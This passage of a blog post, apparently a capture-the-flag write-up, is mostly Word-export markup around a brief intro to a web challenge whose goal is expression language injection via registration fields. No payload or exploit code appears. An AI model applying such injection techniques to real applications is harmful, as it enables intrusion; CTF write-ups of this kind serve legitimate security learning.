<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
</style>
<![endif]-->
</span></div>
<br />
<h3>
<span lang="EN-US" style="mso-ansi-language: EN-US;"><div class="MsoNormal" style="text-align: left;">
<span lang="EN-US" style="mso-ansi-language: EN-US;">The
First School of Bulimia “Edik”</span></div>
</span></h3>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">
</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">The
application consists of 3 "pages": registration, authentication, home
page. The goal is to perform an expression language injection in the home page.
The obstacle is that a user can set values only during registration process...</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">There is a
class of User and it has 3 fields (name, password, weight) in the application. </span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">The
registration controller looks like that:</span></div>
<div class="MsoNormal">
<span style="mso-fareast-language: RU; mso-no-proof: yes;"></span></div>
<br />
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7VNhF2zouXCH7SEDNRRGSnCL3jwPI-mSbGMZR1amM7ov3UPpY1ONPz4LjMAjJN9Qbe7iBfa1Z9diSk5qDdb1TXtlOboXcpBa0fWesDS7g2GXZE_rtePvvLPlF1e5_5k1Zv1dVbaSzHaLa/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="329" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7VNhF2zouXCH7SEDNRRGSnCL3jwPI-mSbGMZR1amM7ov3UPpY1ONPz4LjMAjJN9Qbe7iBfa1Z9diSk5qDdb1TXtlOboXcpBa0fWesDS7g2GXZE_rtePvvLPlF1e5_5k1Zv1dVbaSzHaLa/s640/1.png" width="640" /></a></div>
<div class="MsoNormal">
<span style="mso-fareast-language: RU; mso-no-proof: yes;"></span><span lang="EN-US" style="mso-ansi-language: EN-US;"></span></div>
<br />
<br />
<div class="MsoNormal">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>RU</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
